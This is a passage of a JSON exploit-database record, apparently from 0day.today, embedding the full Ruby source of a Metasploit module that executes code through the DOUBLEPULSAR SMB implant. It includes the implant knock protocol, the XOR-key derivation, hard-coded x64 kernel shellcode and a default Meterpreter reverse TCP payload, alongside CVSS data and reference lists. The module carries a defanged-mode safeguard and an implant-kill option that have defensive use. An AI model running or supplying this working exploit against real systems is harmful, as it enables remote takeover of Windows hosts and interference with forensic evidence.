"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-07T22:13:58", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-07T22:13:58", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => 
true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-08] #"}, "lastseen": "2021-09-07T22:13:58", "differentElements": ["sourceData"], "edition": 10}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "ca153d531c1359dda350e8cbe355ece1", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant by sending it its own kill command. Note that the module ships with the advanced option DefangedMode enabled and refuses to run until it is explicitly disabled: executing code against, or killing, a live DOUBLEPULSAR implant may contaminate forensic evidence on a host that is under investigation, so only proceed with authorization. Payload execution is only supported against the x64 variant of the implant; an x86 implant can still be detected and neutralized.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-08T22:11:45", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142603", "PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "f5", "idList": 
["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42030", "EDB-ID:42031"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
"idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-09-08T22:11:45", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2021-09-08T22:11:45", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
